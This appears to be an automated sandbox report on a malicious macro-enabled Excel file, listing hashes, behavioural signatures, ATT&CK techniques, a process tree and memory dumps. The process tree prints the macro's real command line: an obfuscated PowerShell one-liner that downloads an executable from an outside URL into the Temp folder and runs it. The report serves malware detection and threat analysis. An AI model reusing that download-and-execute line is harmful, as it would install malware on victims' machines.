8c30635fa8cc452d445c345ac855339c23b3845dfe9d3cc91550d17771459a0e

General

Target

New Iquiry.xlsm
Size

143KB
MD5

e815ac129a6c26ba513742fe3e834835
SHA1

0fff500ea03bbac5d9b439cd48ba386739eec351
SHA256

8c30635fa8cc452d445c345ac855339c23b3845dfe9d3cc91550d17771459a0e
SHA512

24008227c5455d7e35acb36a539964979cd63a33f1e81e7a8c51f3417dc1fdf08f5c2aa48e7ab058f96934c81acb7aba4ebd59ea738750bed66bd6bf3a39b5ce

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://hosseinsoltani.ir/BROWNOBC.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1344	4804	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

22 1728 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

yHYWC.bat

pid process

3972 yHYWC.bat

flow	pid	process
22	1728	powershell.exe

pid	process
3972	yHYWC.bat

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4804 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1728 powershell.exe
1728 powershell.exe
1728 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1728 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

4804 EXCEL.EXE
4804 EXCEL.EXE

pid	process
1728	powershell.exe
1728	powershell.exe
1728	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1728	powershell.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

EXCEL.EXE

pid	process
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE
4804	EXCEL.EXE

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

EXCEL.EXEcmd.exe

description	pid	process	target process
PID 4804 wrote to memory of 1344	4804	EXCEL.EXE	cmd.exe
PID 4804 wrote to memory of 1344	4804	EXCEL.EXE	cmd.exe
PID 1344 wrote to memory of 1728	1344	cmd.exe	powershell.exe
PID 1344 wrote to memory of 1728	1344	cmd.exe	powershell.exe
PID 4804 wrote to memory of 3972	4804	EXCEL.EXE	yHYWC.bat
PID 4804 wrote to memory of 3972	4804	EXCEL.EXE	yHYWC.bat
PID 4804 wrote to memory of 3972	4804	EXCEL.EXE	yHYWC.bat

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New Iquiry.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start p^owersh^el^l -w 1 (New-Object Net.WebClient).DownloadFile('http://hosseinsoltani.ir/BROWNOBC.exe',($env:Temp)+'\yHYWC.bat')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (New-Object Net.WebClient).DownloadFile('http://hosseinsoltani.ir/BROWNOBC.exe',($env:Temp)+'\yHYWC.bat')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

C:\Users\Admin\AppData\Local\Temp\yHYWC.bat
C:\Users\Admin\AppData\Local\Temp\yHYWC.bat
2⤵
- Executes dropped EXE
PID:3972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\yHYWC.bat
MD5
ca9cc86fd540cf7a0149e4d440bfdaf1

SHA1
773ee1ed86a1a43fd69315489a8b4aea711be1e7

SHA256
4068c9a37394e76960df6bb73d88760be0371af77a12816346f241d5b1ce1233

SHA512
f4570a1078a640da8fac1927de7439e751d1df6a88c9483f7c8fbc2410ea6104d2f2192671bbeca1927c83ab0c1b3af665a865fe4e47635ba8e7c779d89515b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\yHYWC.bat
MD5
ca9cc86fd540cf7a0149e4d440bfdaf1

SHA1
773ee1ed86a1a43fd69315489a8b4aea711be1e7

SHA256
4068c9a37394e76960df6bb73d88760be0371af77a12816346f241d5b1ce1233

SHA512
f4570a1078a640da8fac1927de7439e751d1df6a88c9483f7c8fbc2410ea6104d2f2192671bbeca1927c83ab0c1b3af665a865fe4e47635ba8e7c779d89515b8

Download Submit
memory/1344-7-0x0000000000000000-mapping.dmp

Download
memory/1728-14-0x00000195AD206000-0x00000195AD208000-memory.dmp

Filesize
8KB

Download
memory/1728-12-0x00000195AD200000-0x00000195AD202000-memory.dmp

Filesize
8KB

Download
memory/1728-13-0x00000195AD203000-0x00000195AD205000-memory.dmp

Filesize
8KB

Download
memory/1728-8-0x0000000000000000-mapping.dmp

Download
memory/1728-9-0x00007FFA581A0000-0x00007FFA58B8C000-memory.dmp

Filesize
9.9MB

Download
memory/1728-10-0x00000195C58F0000-0x00000195C58F1000-memory.dmp

Filesize
4KB

Download
memory/1728-11-0x00000195C5AA0000-0x00000195C5AA1000-memory.dmp

Filesize
4KB

Download
memory/3972-16-0x0000000000000000-mapping.dmp

Download
memory/3972-23-0x0000000005470000-0x0000000005471000-memory.dmp

Filesize
4KB

Download
memory/3972-26-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/3972-25-0x0000000002D50000-0x0000000002D80000-memory.dmp

Filesize
192KB

Download
memory/3972-24-0x0000000002D20000-0x0000000002D21000-memory.dmp

Filesize
4KB

Download
memory/3972-22-0x0000000005870000-0x0000000005871000-memory.dmp

Filesize
4KB

Download
memory/3972-18-0x00000000739D0000-0x00000000740BE000-memory.dmp

Filesize
6.9MB

Download
memory/3972-19-0x00000000008B0000-0x00000000008B1000-memory.dmp

Filesize
4KB

Download
memory/3972-21-0x00000000052D0000-0x00000000052D1000-memory.dmp

Filesize
4KB

Download
memory/4804-3-0x00007FFA3D590000-0x00007FFA3D5A0000-memory.dmp

Filesize
64KB

Download
memory/4804-5-0x00007FFA613D0000-0x00007FFA61A07000-memory.dmp

Filesize
6.2MB

Download
memory/4804-6-0x00007FFA3D590000-0x00007FFA3D5A0000-memory.dmp

Filesize
64KB

Download
memory/4804-4-0x00007FFA3D590000-0x00007FFA3D5A0000-memory.dmp

Filesize
64KB

Download
memory/4804-2-0x00007FFA3D590000-0x00007FFA3D5A0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads